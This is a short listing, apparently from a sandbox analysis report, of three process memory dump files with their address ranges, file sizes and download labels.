memory/5004-1606-0x0000000008230000-0x000000000827B000-memory.dmp

Filesize
300KB

Download
memory/5004-1599-0x0000000007E40000-0x0000000008190000-memory.dmp

Filesize
3.3MB

Download
memory/5020-2179-0x000000006F810000-0x000000006F85B000-memory.dmp

Filesize
300KB

Download